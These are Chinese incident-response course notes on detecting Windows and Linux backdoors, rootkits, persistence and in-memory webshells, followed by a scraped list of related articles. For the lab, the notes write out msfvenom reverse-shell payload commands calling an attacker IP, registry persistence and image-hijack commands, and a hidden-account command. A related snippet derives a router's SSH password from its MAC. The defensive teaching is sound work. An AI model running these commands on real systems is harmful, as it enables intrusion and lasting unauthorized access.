第163天:应急响应-后门攻击检测指南Rookit内存马权限维持WINLinux

在这里插入图片描述

知识点

#知识点
-网页篡改与后门攻击防范应对指南
主要需了解:异常特征,处置流程,分析报告等
主要需了解:日志存储,Webshell检测,分析思路等
掌握:
中间件日志存储,日志格式内容介绍(IP,UA头,访问方法,请求文件,状态码等)
Webshell查杀(常规后门,内存马(单独还有))
分析思路:基于时间,基于漏洞,基于后门筛选(还有)#内容点:
应急响应:
1、抗拒绝服务攻击防范应对指南
2、勒索软件防范应对指南
3、钓鱼邮件攻击防范应对指南
4、网页篡改与后门攻击防范应对指南
5、网络安全漏洞防范应对指南
6、大规模数据泄露防范应对指南
7、僵尸网络感染防范应对指南
8、APT攻击入侵防范应对指南
9、各种辅助类分析工具项目使用
朔源反制:
威胁情报,信息库追踪,设备反制,IDS&IPS等反制,工具漏洞反制,蜜罐钓鱼反制等

在这里插入图片描述

演示案例:1、Windows-后门-常规&权限维持&内存马2、Linux-后门-常规&权限维持&Rootkit&内存马
Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"Linux实验
1、常规MSF后门-分析检测
2、Rootkit后门-分析检测
3、权限维持后门-分析检测
4、Web程序内存马-分析检测
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
Rootkit后门:GScan rkhunter 
权限维持后门:GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz 
cd rkhunter-1.4.6 
./installer.sh --layout default --install
rkhunter -cWeb层面:通用系统层面
1、常规后门
2、内存马(无文件马)PHP.NETJAVAPython

总结

1、对于系统层面的后门:
1.1、windows
对于常规MSF后门,其一般会有网络外连的情况,可使用火绒剑、PCHunter工具查看网络,针对网络外连的进行逐一排查
对于权限维持后门,比如自启动、映像劫持,在火绒剑、PCHunter里也有对应的栏目,也可逐一排查1.2、linux
对于常规MSF后门,其一般会有网络外连的情况,可使用命令:netstat -anpt  针对网络外连的进行逐一排查
对于Rootkit、权限维持后门,可使用工具GScan、rkhunter进行排查2、对于Web层面的后门:
2.1、普通Web后门
基于客户反映的情况,我们拿到的信息可能是时间、漏洞,也可能什么也没有。
如果有大概时间信息,那么可以通过时间筛选日志,看IP、请求地址、UA头、响应码等定位攻击,再锁定该IP看有无其他行为
如果只知道框架信息,那么就根据框架可能存在的漏洞,复现一遍,查看新产生的日志拿到攻击指纹信息,然后以此筛选日志,定位攻击
如果没有任何信息,那么先使用后门查杀工具锁定后门,看哪个IP在访问该后门,然后针对该IP筛选日志,定位攻击2.2、内存马
PHP内存马其实是进程马,只要把对应进程停掉,删除后就没了;Java内存马才是真正意义上的内存马
Java内存马根据不同的Java中间件有不同的实现方式,比如Tomcat的内存马主要有Servlet、Filter、Listener、Tomacat Valve
使用工具查杀Java内存马:
河马的内存马查杀工具(优点:适用多种中间件的内存马;缺点:易出Bug,不支持直接Dump或Kill)
脚本 tomcat-memshell-scanner.jsp(优点:好用,支持直接Dump或Kill;缺点:只支持Tomcat的内存马)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/14687.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据分析实战(基础篇):从数据探索到模型解释

前言 本文着重介绍数据分析实战的基础知识和技巧,探索从数据探索到建模再到模型解释的完整过程内容包含数据探索、模型建立、调参技巧、SHAP模型解释数据来源于kaggle平台,crab age prediction数据集,数据详情 数据说明 数据背景 螃蟹味道…

Matlab数学建模实战——(Lokta-Volterra掠食者-猎物方程)

1.题目 问题1 该数学建模的第一问和第二问主要是用Matlab求解微分方程组,直接编程即可。 求解 Step1改写 y(1)ry(2)f Step2得y的导数 y(1).2y(1)-ay(1)*y(2)y(2).-y(2)a*y(1)*y(2) Step3编程 clear; a0.01; F(t,y)[2*y(1)-a*y(1)*y(2);-y(2)a*y(1)*y(2)]; […

Windows环境Jmeter调优

在windows环境下搭建jmeter的压测实验环境,需要对操作系统默认的一些个参数进行设置,以提高并发能力。特别是作为压力机的时候。 Socket 编程时,单机最多可以建立多少个 TCP 连接,受到操作系统的影响。 Windows 下单机的TCP连接数…

TL-ER2260T获取SSH密码并登录后台

TL-ER2260T获取SSH密码并登录后台 首先需要打开诊断模式 打开Ubuntu,通过如下指令计算SSH密码,XX-XX-XX-XX-XX-XX是MAC地址echo -n "XX-XX-XX-XX-XX-XX" | tr -d - | tr [a-z] [A-Z] | md5sum | cut -b 1-16SSH登录ssh -oKexAlgorithmsdiffie…

haproxy负载均衡

目录 一.常见的web集群调度器 二.haproxy的概念 三.特性 四 图解haproxy 五 haproxy的配置文件详解 一.常见的web集群调度器 1.目前常见的web集群调度器分为软件和硬件 2.软件通常使用开源的lvs/haproxy/nginx 3.硬件一般使用比较多的是f5 也有国内的产品 二.haproxy的…

小机器人在现实世界中学会快速驾驶

小机器人在现实世界中学会快速驾驶 —强化学习加上预训练让机器人赛车手加速前进— Without a lifetime of experience to build on like humans have (and totally take for granted), robots that want to learn a new skill often have to start from scratch. Reinforceme…

系统吞吐量(TPS)、用户并发量、性能测试概念和公式

目录 PS:下面是性能测试的主要概念和计算公式,记录下: 一.系统吞度量要素: 二.系统吞吐量评估: 软件性能测试的基本概念和计算公式 一、软件性能的关注点 二、软件性能的几个主要术语 PS&…

hive数据的导入导出

一、hive 的数据导入 Linux本地文件以及数据格式: 在hive中创建表: create table t_user( id int ,name string ) row format delimited fields terminated by "," lines terminated by \n stored as textfile;stored as常见的几种格式 1.…

使用wordpress搭建WebStack导航网站记录

0 序言 首先,我来介绍下,这个webstack导航网站实际上是被做成了wordpress的一个主题,具体这个主题的下载地址如下: WordPress 版 WebStack 导航主题https://github.com/owen0o0/WebStack 我们不需要使用git clone命令&…

回归预测 | MATLAB实现CNN-BiGRU-Attention多输入单输出回归预测

回归预测 | MATLAB实现CNN-BiGRU-Attention多输入单输出回归预测 目录 回归预测 | MATLAB实现CNN-BiGRU-Attention多输入单输出回归预测预测效果基本介绍模型描述程序设计参考资料 预测效果 基本介绍 MATLAB实现CNN-BiGRU-Attention多输入单输出回归预测,CNN-GRU结合…

机器人轨迹生成:轨迹规划与路径规划

机器人轨迹生成涉及到轨迹规划和路径规划两个关键概念,它们是机器人运动控制中的重要组成部分。下面对轨迹规划和路径规划进行深入比较。 轨迹规划(Trajectory Planning): 定义:轨迹规划是指在机器人运动中确定机器人末…

Linux 文件属性

ubuntu命令行下输入以下命令: ls- al第一个字符表示“文件类型”,它是目录、文件或链接文件等。 文件类型后面的 9 个字符以 3 个为一组,第一组表示“文件所有者的权限”;第二组表示“用户组的权限”;第三组表示“其…